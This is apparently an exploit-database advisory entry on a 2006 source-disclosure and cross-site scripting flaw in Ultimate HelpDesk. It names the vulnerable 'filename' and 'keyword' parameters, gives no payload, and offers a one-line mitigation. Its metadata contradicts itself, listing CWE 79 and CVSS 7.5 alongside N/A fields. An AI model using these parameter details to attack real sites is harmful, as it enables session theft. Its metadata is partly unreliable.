vendor:
Ultimate HelpDesk
by:
ajann
7,5
CVSS
HIGH
Source/XSS
79
CWE
Product Name: Ultimate HelpDesk
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
A vulnerability exists in Ultimate HelpDesk All Version, which allows an attacker to inject malicious code into the application. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerability is located in the 'filename' parameter of the 'getfile.asp' script and the 'keyword' parameter of the 'index.asp' script. Successful exploitation requires that the attacker has knowledge of the application's directory structure and the ability to inject malicious code into the application.
Mitigation:
Input validation should be used to prevent the execution of malicious code.
